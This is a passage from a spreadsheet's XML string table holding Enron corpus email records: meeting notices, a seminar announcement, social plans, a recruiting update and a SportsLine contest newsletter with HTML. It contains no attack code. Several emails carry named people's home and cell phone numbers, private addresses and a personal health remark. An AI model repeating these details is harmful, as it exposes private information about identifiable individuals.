&gt;&gt; _x000D_
&gt;&gt; _x000D_
&gt;&gt;Molly, please fill out this sheet for me! _x000D_
&gt;&gt; _x000D_
&gt;&gt; &lt;&gt; _x000D_
&gt;&gt; _x000D_
&gt;&gt;&lt;&lt; PickSheet-Week8.xls &gt;&gt; _x000D_
&gt; _x000D_
_x000D_
  _____  _x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com &lt;http://go.msn.com/bql/hmtag_itl_EN.asp&gt;</t>
  </si>
  <si>
    <t>Fri, 16 Mar 2001 07:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ostdiek@rice.edu'})</t>
  </si>
  <si>
    <t xml:space="preserve">Enron Seminar Series in Finance_x000D_
Jones Graduate School of Management, Rice University_x000D_
_x000D_
Paul Schultz_x000D_
University of Notre Dame_x000D_
_x000D_
will give a seminar at the Jones School on Friday, March 30,?=20_x000D_
_x000D_
?????????????????????????????????????? =01&amp;Who Makes Markets=018_x000D_
_x000D_
The seminar will begin at 3:30 in Room 115._x000D_
_x000D_
The paper will be made available shortly._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 May 2001 15:07:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tara.piazze@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({"justin.o'malley@enron.com", 'nate.blackburn@enron.com', 'sabina.rank@enron.com', 'matt.smith@enron.com'})</t>
  </si>
  <si>
    <t>STP meeting</t>
  </si>
  <si>
    <t>Please plan to attend an STP meeting tomorrow morning at 10:30 am.  Place TBD.  Bring all current and future projects, along with timelines and resources.  We will be setting priorities at this meeting, so that we are all on the same sheet of music._x000D_
Thanks for your cooperation,_x000D_
Tara</t>
  </si>
  <si>
    <t>texas customers</t>
  </si>
  <si>
    <t xml:space="preserve">please add individual HPL contact and Texas desk contact.  thanks._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Meet w/Mary Solmonson RE: MATRIX  eb2129</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Meet w/Mary Solmonson RE: MATRIX  eb2129_x000D_
_x000D_
Date:		12/15/2000_x000D_
Time:		4:00 PM - 5:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Thu, 4 May 2000 03:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>follow up to legal/credit meeting</t>
  </si>
  <si>
    <t>(1)  Please change Consolidated Papers Inc. to "medium" priority._x000D_
(2)  Please follow up on James Hardie and enter into Lotus Notes.</t>
  </si>
  <si>
    <t>Wed, 20 Oct 1999 10:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sharon@travelpark.com'})</t>
  </si>
  <si>
    <t>FW: New Year's Eve Entertainment &amp; Menus</t>
  </si>
  <si>
    <t>&gt; ----------_x000D_
&gt; From:  Sharon Lay_x000D_
&gt; Sent:  Wednesday, October 20, 1999 1:11 PM_x000D_
&gt; To:  'kenneth.lay@enron.com'_x000D_
&gt; Subject:  FW: New Year's Eve Entertainment &amp; Menus_x000D_
&gt;_x000D_
&gt; Hola Ken,_x000D_
&gt; This is for your review before the conference call this afternoon at_x000D_
&gt; 4:15pm.  Call me if you have any questions._x000D_
&gt; Sharon Sue_x000D_
&gt; ----------_x000D_
&gt; From:  Sheri Roane[SMTP:sheri.roane@airmail.net]_x000D_
&gt; Reply To:  sheri.roane@airmail.net_x000D_
&gt; Sent:  Wednesday, October 20, 1999 1:13 PM_x000D_
&gt; To:  sharon@travelpark.com_x000D_
&gt; Subject:  New Year's Eve Entertainment &amp; Menus_x000D_
&gt;_x000D_
&gt;  &lt;&lt;Agenda for New Year's.doc&gt;&gt;_x000D_
&gt; Here's the proposal for this afternoon's discussion.  I have not_x000D_
&gt; forwarded it to the sponsors --  please review and call me at_x000D_
&gt; 713=545-0420.  Thanks.  Sheri_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - Agenda for New Year's.doc</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 08:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Roman,_x000D_
_x000D_
Sorry. I am leaving for Philadelphia this evening. Leaving office around 5_x000D_
p.m. Let's get together on another occasion._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Roman Kosecki &lt;rkosecki@mieco.com&gt; on 10/18/2000 02:09:28 PM_x000D_
To: "'Vince.J.Kaminski@enron.com '" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE:_x000D_
_x000D_
_x000D_
 Hi Vince,_x000D_
   I am in Houston now. Will have to work late . But how about drinks/food_x000D_
some time around 7-8 or later ?  I am staying at Wyndham Greenplace (?) and_x000D_
will use taxi to get around._x000D_
  Thanks_x000D_
Roman_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vince.J.Kaminski@enron.com_x000D_
To: rkosecki@mieco.com_x000D_
Sent: 10/13/00 7:55 AM_x000D_
Subject: RE:_x000D_
_x000D_
_x000D_
Roman_x000D_
_x000D_
Thanks._x000D_
_x000D_
My home number is 281 367 5377_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Roman Kosecki &lt;rkosecki@mieco.com&gt; on 10/13/2000 09:38:39 AM_x000D_
_x000D_
To:   "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:  RE:_x000D_
_x000D_
_x000D_
I will be in Houston on Wed. Willl give you a call_x000D_
Roman_x000D_
_x000D_
-----Original Message-----_x000D_
From: Vince.J.Kaminski@enron.com [mailto:Vince.J.Kaminski@enron.com]_x000D_
Sent: Thursday, October 12, 2000 2:43 PM_x000D_
To: rkosecki@mieco.com_x000D_
Subject: Re:_x000D_
_x000D_
_x000D_
_x000D_
Roman,_x000D_
_x000D_
Drinks after work would be better. I am flying back from Ca on Tue_x000D_
morning._x000D_
Please, call me at 713 853 3848 or 713 410 5396 (cell)_x000D_
in the afternoon._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Roman Kosecki &lt;rkosecki@mieco.com&gt; on 10/12/2000 12:21:50 PM_x000D_
_x000D_
To:   "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:_x000D_
Subject:_x000D_
_x000D_
_x000D_
Hi Vince_x000D_
   I will be in Houston for a few days next week ( like mon-wed). If you_x000D_
are_x000D_
back from your European trips maybe we can "do" lunch ?_x000D_
   Roman_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 15:51:50 -0800 (PST)</t>
  </si>
  <si>
    <t>Its Time for the Big Game at Megasports.com!</t>
  </si>
  <si>
    <t>--____________________________Next_x000D_
Content-Type: text/plain_x000D_
_x000D_
*****************************************************************_x000D_
To view the COLOR version of this message, click here:_x000D_
http://www.sportsline.com/u/newsletters/mail53_1.html?1912980_x000D_
*****************************************************************_x000D_
_x000D_
==================================================_x000D_
A SPECIAL OFFER_x000D_
brought to you by CBS SportsLine.com_x000D_
==================================================_x000D_
Megasports.com presents to you our special Big Game edition of our weekly Million_x000D_
Dollar Contest._x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/links/6/1/110/excl201m1.cgi_x000D_
_x000D_
*Answer 20 questions_x000D_
*Win $1,000,000_x000D_
*No frills, no gimmicks, no fees. Its totally FREE!_x000D_
_x000D_
You give us 20 correct answers, and we will give you $1,000,000! Even if you dont get_x000D_
it all right, you can still win Fabulous Prizes! Total given away to date: Over 900,000_x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/links/6/1/110/excl201m3.cgi_x000D_
_x000D_
So this week, it doesnt matter who wins the Big Game, you can still win big with Megasports.com!_x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/6/1/110/excl201m4.cgi_x000D_
_x000D_
Click here to win now!_x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/links/6/1/110/excl201m5.cgi_x000D_
_x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
			FREE Daily Pick 4_x000D_
_x000D_
The Hottest game on the web today! The Daily Pick 4. Where else can you win $2,000 a_x000D_
day? Its too easy, every day all you have to do is give us 4 answers and you can win up to_x000D_
$2,000 a day! Theres a different set of questions everyday which means that there is a_x000D_
chance to win $2,000 every day!_x000D_
_x000D_
Pick 4 to win now!_x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/links/6/1/110/excl201m6.cgi_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
*************************************************************************************_x000D_
You received this e-mail because you registered on CBS SportsLine.com. If you do not want_x000D_
to receive these special e-mail offers you can unsubscribe by clicking this link: http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/u/newsletters/newsletter.cgi?email=dutch.quigley@enron.com ._x000D_
You are subscribed as [{(dutch.quigley@enron.com)}] ._x000D_
_x000D_
Although we are sending this e-mail to you, SportsLine.com is not responsible for the_x000D_
advertisers' content and makes no warranties or guarantees about the products or services_x000D_
advertised. SportsLine.com takes your privacy seriously. To learn more about SportsLine.com's_x000D_
use of personal information, please read our Privacy Statement at_x000D_
http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/u/userservices/privacy.htm_x000D_
*************************************************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--____________________________Next_x000D_
Content-Type: text/html_x000D_
_x000D_
&lt;!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;_x000D_
_x000D_
&lt;html&gt;_x000D_
&lt;head&gt;_x000D_
	&lt;title&gt;Megasports.com - Win Big Money.. FREE!&lt;/title&gt;_x000D_
&lt;style type="TEXT/CSS"&gt;_x000D_
&lt;!--_x000D_
.WHITE {color: #FFFFFF;text-decoration: none;}_x000D_
.black {color: #000000;text-decoration: none;}_x000D_
a:hover {text-decoration: underline;}_x000D_
---&gt;_x000D_
&lt;/style&gt;_x000D_
_x000D_
&lt;/head&gt;_x000D_
_x000D_
&lt;body bgcolor="#FFFFFF" link="#3335CC"&gt;_x000D_
&lt;!--  Header image goes here --&gt;_x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
&lt;tr&gt;&lt;td&gt;&lt;img src="http://images.sportsline.com/images/newsletter/ee-header1.gif" width="600" height="64" border="0" alt=""&gt;&lt;/td&gt;_x000D_
&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;!-- End of header image --&gt;_x000D_
_x000D_
_x000D_
&lt;!-- Start Title and images Content here! --&gt;_x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
&lt;tr valign="top"&gt;&lt;td width="5" bgcolor="#03037B"&gt; &lt;/td&gt;_x000D_
	&lt;td width="590" align="center"&gt;_x000D_
		&lt;!--Table1--&gt;_x000D_
		&lt;table width="539" cellspacing="0" cellpadding="0" border="0" bgcolor="#C0BB81"&gt;_x000D_
		&lt;tr&gt;&lt;td&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=56&amp;SESSION=Sportslinedrop3_2002_1_29&amp;Other=headerimage"&gt;&lt;img src="http://images.sportsline.com/images/newsletter/megasports_539x61.gif" width="539" height="61" border="0" alt="Win big prizes with Megasports.com!"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=headertab"&gt;&lt;img src="http://images.sportsline.com/images/newsletter/megasports_539x29.gif" border="0" width="539" height="29" alt="Win $1,000,000!"&gt;&lt;/a&gt;&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;/table&gt;_x000D_
_x000D_
		&lt;!--Table2--&gt;_x000D_
		&lt;table width="539" cellpadding="5" cellspacing="0" border="0" bgcolor="#C0BB81"&gt;_x000D_
		&lt;tr valign="top"&gt;&lt;td align="center"&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=48&amp;SESSION=Sportslinedrop2_2001_12_28&amp;OTHER=winnergraphic"&gt;&lt;img src="http://images.sportsline.com/images/newsletter/megasports_134x128.gif" border="0" width="134" height="128" alt="Click here for more winners!"&gt;&lt;/a&gt;_x000D_
		&lt;font face="arial, helvetica" size="2"&gt;_x000D_
		&lt;br&gt;_x000D_
		&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=48&amp;SESSION=Sportslinedrop2_2001_12_28&amp;OTHER=winnertext"&gt;Click here to see more winners!&lt;/a&gt;_x000D_
		&lt;/font&gt;&lt;/td&gt;_x000D_
		&lt;td&gt;&lt;font face="arial, helvetica"&gt;&lt;h4 align="center"&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontextheader" class="black"&gt;_x000D_
		Its Time for the Big Game at Megasports.com!&lt;/a&gt;&lt;/h4&gt;_x000D_
_x000D_
		&lt;font size="2"&gt;_x000D_
		&lt;p&gt;Megasports.com presents to you our special &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontext01"&gt;Big Game edition&lt;/a&gt; of our weekly &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontext02"&gt;Million Dollar Contest&lt;/a&gt;._x000D_
_x000D_
		&lt;ul&gt;_x000D_
		 &lt;li&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontextbullet01" class="black"&gt;Answer 20 questions&lt;/a&gt;_x000D_
		 &lt;li&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontextbullet02" class="black"&gt;Win &lt;b&gt;$1,000,000&lt;/b&gt;&lt;/a&gt;_x000D_
		 &lt;li&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontextbullet03" class="black"&gt;No frills, no gimmicks, no fees. &lt;b&gt;Its totally FREE!&lt;/b&gt;&lt;/a&gt;_x000D_
		&lt;/ul&gt;_x000D_
		&lt;/font&gt;&lt;/font&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
_x000D_
		&lt;tr&gt;_x000D_
		&lt;td colspan="2"&gt;_x000D_
		 &lt;font face="arial, helvetica" size="2"&gt;_x000D_
		 &lt;p&gt;You give us 20 correct answers, and we will give you $1,000,000! Even if you dont get it all right, you can still win &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=48&amp;SESSION=Sportslinedrop2_2001_12_28&amp;OTHER=milliontext03"&gt;Fabulous Prizes!&lt;/a&gt;&lt;/p&gt;_x000D_
		&lt;p&gt;So this week, it doesnt matter who wins the Superbowl, you can still win big with &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=56&amp;SESSION=Sportslinedrop3_2002_1_29&amp;Other=milliontext04"&gt;Megasports.com!&lt;/a&gt;&lt;/p&gt;_x000D_
		&lt;p align="center"&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=milliontextbottom"&gt;Click here to win now!&lt;/a&gt;&lt;/p&gt;_x000D_
		&lt;/font&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;/table&gt;_x000D_
_x000D_
		&lt;!--Table3--&gt;_x000D_
		&lt;table width="539" cellpadding="5" cellspacing="0" border="0" bgcolor="#C0BB81" align="center"&gt;_x000D_
		&lt;tr&gt;&lt;td colspan="2"&gt;&lt;hr width="85%" align="center"&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;tr valign="top"&gt;_x000D_
		&lt;td&gt;_x000D_
_x000D_
		&lt;font face="arial, helvetica"&gt;&lt;h4 align="center"&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=55&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=pick4texttoplink" class="black"&gt;FREE Daily Pick 4&lt;/a&gt;&lt;/h4&gt;_x000D_
_x000D_
		&lt;font size="2"&gt;_x000D_
		&lt;p&gt;The Hottest game on the web today! The Daily Pick 4. Where else can you win $2,000 a day? Its too easy, every day all you have to do is give us 4 answers and you can win up to $2,000 a day! Theres a different set of questions everyday which means that there is a chance to win $2,000 every day!&lt;/p&gt;_x000D_
_x000D_
		&lt;p align="center"&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=55&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=pick4textbottomlink"&gt;Pick 4 to win now!&lt;/a&gt;&lt;/p&gt;_x000D_
		&lt;/font&gt;&lt;/font&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;td&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=55&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=girlpic"&gt;_x000D_
		&lt;img src="http://images.sportsline.com/images/newsletter/megasports_207x210.jpg" border="0" width="207" height="210" alt="Pick 4 to win!"&gt;&lt;/a&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;tr&gt;&lt;td colspan="2"&gt;&lt;hr width="85%" align="center"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;_x000D_
		&lt;/table&gt;_x000D_
_x000D_
		&lt;table width="539" cellpadding="5" cellspacing="0" border="0" bgcolor="#000000" align="center"&gt;_x000D_
		&lt;tr align="center"&gt;_x000D_
		&lt;td&gt;_x000D_
		&lt;font face="arial, helvetica" size="2" color="#FFFFFF"&gt;_x000D_
		&lt;b&gt;&lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=71&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=bottomtextlink" class="white"&gt;Win $1,000,000&lt;/a&gt; | &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=55&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=bottomtextlink" class="white"&gt;Daily Pick 4&lt;/a&gt; | &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=68&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=bottomtextlink" class="white"&gt;FAQ's&lt;/a&gt; | &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=69&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=bottomtextlink" class="white"&gt;About Megasports.com&lt;/a&gt; | &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;mail.megasports.com/cgi-bin/nph-t.pl?U=70&amp;SESSION=Sportslinedrop2_2001_12_28&amp;Other=bottomtextlink" class="white"&gt;Privacy Statement&lt;/a!_x000D_
&gt;&lt;/b&gt;_x000D_
		&lt;/font&gt;_x000D_
		&lt;/td&gt;_x000D_
		&lt;/tr&gt;_x000D_
		&lt;/table&gt;_x000D_
_x000D_
	&lt;/td&gt;_x000D_
    &lt;td width="5" bgcolor="#03037B"&gt; &lt;/td&gt;_x000D_
&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
&lt;!-- End of client content and images--&gt;_x000D_
_x000D_
_x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
&lt;tr&gt;&lt;td width="5" bgcolor="#03037B"&gt; &lt;/td&gt;_x000D_
	&lt;td width="10"&gt; &lt;/td&gt;_x000D_
	&lt;td width="570"&gt;_x000D_
	&lt;p&gt;&lt;br&gt;_x000D_
	&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;_x000D_
	You received this e-mail because you registered on CBS SportsLine.com. If you do not want to receive these special e-mail offers you can unsubscribe by clicking this link: &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/u/newsletters/newsletter.cgi?email=dutch.quigley@enron.com"&gt;http://www.sportsline.com/u/newsletters/newsletter.cgi?email=dutch.quigley@enron.com&lt;/a&gt;. You are subscribed as [{(dutch.quigley@enron.com)}] ._x000D_
	&lt;p&gt;_x000D_
	Although we are sending this e-mail to you, SportsLine.com is not responsible for the advertisers' content and makes no warranties or guarantees about the products or services advertised. SportsLine.com takes your privacy seriously. To learn more about SportsLine.com's use of personal information, please read our Privacy Statement at &lt;a href="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/u/userservices/privacy.htm"&gt;http://cbs.sportsline.com/u/userservices/privacy.htm&lt;/a&gt;_x000D_
	&lt;/font&gt;&lt;/td&gt;_x000D_
	&lt;td width="10"&gt; &lt;/td&gt;_x000D_
	&lt;td width="5" bgcolor="#03037B"&gt; &lt;/td&gt;_x000D_
&lt;/tr&gt;&lt;/table&gt;_x000D_
_x000D_
&lt;!-- Bottom bar image table --&gt;_x000D_
&lt;table width="600" border="0" cellspacing="0" cellpadding="0"&gt;_x000D_
&lt;tr&gt;&lt;td&gt;&lt;img src="http://images.sportsline.com/images/newsletter/ee-footer.gif" width="600" height="7" border="0" alt=""&gt;&lt;/td&gt;_x000D_
&lt;/tr&gt;_x000D_
&lt;/table&gt;_x000D_
_x000D_
&lt;!-- PLEASE DO NOT REMOVE --&gt;_x000D_
&lt;!-- [{(dutch.quigley@enron.com)}] --&gt;_x000D_
_x000D_
&lt;img src="http://ww1.sportsline.com/links/click.cgi?53&amp;1&amp;1912980&amp;/images/tracker/open_email.gif" width="1" height="1" border="0"&gt;_x000D_
&lt;/body&gt;_x000D_
&lt;/html&gt;_x000D_
&lt;!--Deployed By sentam 1.31.2002 11:18:9 Log#:20020131111808_12363_sentam--&gt;_x000D_
_x000D_
_x000D_
_x000D_
--____________________________Next--</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 04:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'althea.gordon@enron.com'})</t>
  </si>
  <si>
    <t>Re: Another Stanford Acceptance</t>
  </si>
  <si>
    <t xml:space="preserve">Althea_x000D_
_x000D_
Great news. It's all your hard work._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Althea Gordon@ENRON_x000D_
04/20/2001 01:43 PM_x000D_
To: vince.kaminski@enron.com, brad.romine@enron.com, brad.alford@enron.com, _x000D_
martin.lin@enron.com, Stephen.swain@enron.com, matt_harris@enron.net, _x000D_
elliot.mainzer@enron.com, mauricio.mora@enron.com, victor.browner@enron.com_x000D_
cc: greg.whalley@enron.com, traci.warner@enron.com, patricia.payton@enron.com _x000D_
Subject: Another Stanford Acceptance_x000D_
_x000D_
Stanford Team, _x000D_
_x000D_
We have received yet another acceptance - Noah Jacobs has accepted our offer _x000D_
as a summer associate.  We are now 4 of 6 for our summer offers.  I have sent _x000D_
Paul Kasper, our one full time offer a cultivation gift and will be checking _x000D_
in on him next week.  Also Eric Cope, a Stanford student that Vince _x000D_
Kaminski's group had interviewed here in Houston for a summer associate _x000D_
position has also accepted.  All in all our Stanford numbers are looking _x000D_
great!_x000D_
_x000D_
Many thanks to everyone and keep up the great work!_x000D_
Althea_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 09:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lstavinoha@themedlehgroup.com'})</t>
  </si>
  <si>
    <t>frozenset({'stewart@mallia.com', 'schneidr@aramco.com', 'toomanygrubbs@aol.com', 'p.clark@mindspring.com', 'mlednicky@deloitte.com', 'deana@tinsleygroup.com', 'jenwalker@deloitte.com', 'baughmanpatricia@hotmail.com', 'mgrubbs@deloitte.com', 'matelske@aramco.com', 'annelle.york@wilcom.com', 'pclark@circadiumtech.com', 'mstewart3@officedepot.com', 'bbourque@txpetrochem.com', 'jilallen@deloitte.com', 'chamby@us-analytics.com', 'ksiblik@dttus.com', 'timothy.a.roberts.42@nd.edu', 'bennomeier@hotmail.com', 'mboudreaux@romcopromo.com', 'bcjh1@juno.com', 'debra_krause@hotmail.com', 'debra_krause@tfcomp.com', 'cstrain@deloitte.com', 'mrohrig@deloitte.com', 'stepatton@deloitte.com', 'michael.l.lewis@ac.com', 'trobert2@nd.edu', 'kpk2001@yahoo.com', 'jmckee@sterlingchemicals.com', 'missi_grubbs@hotmail.com', 'ch2mg@allstate.com', 'cpatton@deloitte.com', 'eradle@deloitte.com', 'rleonard@deloitte.com', 'don.baughman@enron.com', 'lsaenz@deloitte.com', 'erins@mfslhou.com', 'reidstav@houston.rr.com', 'cstrain@ev1.net', 'jhector@tmh.tmc.edu', 'rrepschleger@home.com', 'jatate@deloitte.com'})</t>
  </si>
  <si>
    <t>Another Move Up the Career Ladder</t>
  </si>
  <si>
    <t>Tomorrow, April 20th is my last day at The MedLeh Group.  I have accepted a_x000D_
position at Flow-Zone, a company in Pearland.  Forward any e-mails to me to_x000D_
lalenastav@yahoo.com  I will send an updated e-mail address for Flow-Zone_x000D_
when I get it set-up._x000D_
Lalena Stavinoha_x000D_
The MedLeh Group Mgmt. Co._x000D_
5120 Woodway_x000D_
Suite 10004_x000D_
Houston, Texas 77056_x000D_
tel.  713-552-0591 x223_x000D_
fax. 713-552-1874_x000D_
_x000D_
http:  www.themedlehgroup.com_x000D_
mailto: lstavinoha@themedlehgroup.com</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 07:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tobin.carlson@enron.com', 'wilson.kriegel@enron.com', 'sunil.dalal@enron.com', 'minal.dalia@enron.com', 'benjamin.freeman@enron.com', 'nicholas.stephan@enron.com'})</t>
  </si>
  <si>
    <t>Beef...It's what's for dinner.</t>
  </si>
  <si>
    <t>Barring weather issues, it would appear as though we are on for Little _x000D_
Woodrow's tonight.  I don't believe a definite time has been set as of yet, _x000D_
but seeing as how they ran out of steaks last week I suggest we get there as _x000D_
early as possible._x000D_
_x000D_
Should we be rained out an alternative location will be chosen.</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 07:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Valentines Special</t>
  </si>
  <si>
    <t xml:space="preserve">Myself,  being of Mexican descent there is no need for this snake oil.  _x000D_
Please double check with the Russell Belato's of the world. </t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 05:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">No worries.  I'm not going anywhere.  Focus on you.  If you're body's _x000D_
reacting poorly, swift action is warranted.  If there's anything I can do to _x000D_
help, don't hesitate. Hang in there._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Courtney Abernathy &lt;courtney_abernathy@yahoo.com&gt;_x000D_
	10/11/2000 11:03 PM_x000D_
		 _x000D_
		 To: Jeff.Dasovich@enron.com_x000D_
		 cc: _x000D_
		 Subject: Re:_x000D_
_x000D_
Thanks Jeff-_x000D_
I really appreciate the talk and your perspective. _x000D_
I'm still undecided about school, still need to have_x000D_
the talk with my contact guy at eLoyalty.  Planning on_x000D_
that for Friday.  No decisions, lots of open emotional_x000D_
stuff going on.  I would like to grab lunch or_x000D_
whatever at some point, but not in the real near_x000D_
future...I've got to settle my schedule a bit or I'm_x000D_
going to literally pass out.  My body is reacting to_x000D_
the abuse quite badly.  Maybe if I get back on the_x000D_
beach in a week or two!  Anyway-talk to you later and_x000D_
thanks again-_x000D_
Courntey_x000D_
--- Jeff.Dasovich@enron.com wrote:_x000D_
